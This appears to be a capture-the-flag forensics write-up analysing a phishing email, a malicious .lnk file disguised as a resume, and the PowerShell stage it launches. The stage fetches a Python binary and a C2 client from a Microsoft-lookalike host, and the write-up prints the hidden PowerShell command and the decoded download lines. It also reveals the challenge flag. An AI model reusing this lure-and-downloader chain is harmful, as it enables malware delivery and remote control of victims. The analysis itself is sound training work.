A New Hire
Personal Rating: Easy
This forensics challenge starts with an .eml file and we are also provided with a docker instance that hosts a web server. Upon inspecting it in a text editor, you find this note in the message body:

Accessing the web server at this page, there is not much to see. The page source, however, revealed another web directory that could not have been found via fuzzing.

Navigating to http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumes/ you are presented with a listable directory and a file in it:

After downloading the file with wget 'http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumes/Resume.pdf .lnk', I inspected it in a text editor. As expected, malicious code was hidden inside:

This command seems to be executed by the .lnk file:
C:\Windows\System32\cmd.exe /c powershell.exe -W Hidden -nop -ep bypass -NoExit -E <SNIP>
The content of the base64-encoded script (PowerShell's -E flag takes a base64 string wrapping UTF-16LE text) could be extracted with CyberChef. This command is also a good alternative:
echo 'WwBTAHkAcw<SNIP>AdAAuAHAAeQA=' | base64 -d
The result is this PowerShell script:
[System.Diagnostics.Process]::Start('msedge', 'http://storage.microsoftcloudservices.com:33370/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf');
\\storage.microsoftcloudservices.com@33370\3fe1690d955e8fd2a0b282501570e1f4\python312\python.exe
\\storage.microsoftcloudservices.com@33370\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py
This indicates that the "official resume" along with a standalone Python binary and a potential Python C2 client are downloaded from the web server to the victim host.
Navigating to http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf lets you download the actual PDF file. Consistent with the story, we obtained the official resume of the evil mastermind Lord Malakar.

For good measure, I quickly checked whether there was anything obviously suspicious in the PDF file. This was not the case.
exiftool resume_official.pdf
<SNIP>
PTEX Fullbanner : This is pdfTeX, Version 3.141592653-2.6-1.40.26 (TeX Live 2024) kpathsea version 6.4.0
Producer : pdfTeX-1.40.26
<SNIP>
The next interesting part to look at was the file client.py. It could also be downloaded with wget or by navigating to the corresponding URL at "\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py". Inspecting it in a text editor, you could see two base64 blobs. One of them is called "key". Decoding it yielded the flag!
echo 'SFRCe<SNIP>F9Cg==' | base64 -d
HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}
Decoding the larger base64 blob only shows raw, unreadable data, but the final lines of the script explain why:

As suspected, client.py serves as a connection agent for a Meterpreter session.